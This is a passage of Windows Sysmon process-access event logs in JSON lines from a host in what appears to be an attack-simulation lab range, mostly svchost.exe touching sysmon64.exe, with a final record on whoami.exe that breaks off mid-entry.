C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5502,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5503,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5504,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5505,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5506,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5507,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5508,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5509,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-00107B940A00}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 